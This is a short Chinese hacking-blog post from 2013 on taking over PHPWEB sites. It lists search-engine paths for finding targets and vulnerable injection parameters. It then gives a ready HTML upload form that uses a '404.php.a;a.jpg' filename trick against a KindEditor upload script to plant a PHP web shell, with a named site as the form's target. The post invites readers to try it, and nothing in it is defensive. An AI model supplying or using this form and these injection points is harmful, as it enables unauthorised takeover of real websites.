记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

PHPWEB注射拿shell

2013-01-08 01:10

今天橘子大牛发了个phpweb的exp。已经是xday了。

感觉拿shell还是比较给力的!

网站后台:admin.php

关键查找url:

maq/class

down/html

page/news

page/guide

注射点:

baidu or Google down/class/index.php?myord=1

webmall/query.php?catid=

webmall/query.php?typeid=

webmall/queru.php?typeid=

直接放萝卜去:

网上已经有各种注入exp了。

search.php构造注射,伪静态注射。

不妨去试试!

上传html脚本:

<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://ashker.net/kedit/upload_cgi/upload.php”>
<input type=”text” name=”fileName” value=”404.php.a;a.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>

原理你懂的!已经不新鲜了。


知识来源: www.ashker.net/index.php/archives/606

阅读:443938 | 评论:0 | 标签:Code PHP

想收藏或者和大家分享这篇好文章→复制链接地址

“PHPWEB注射拿shell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云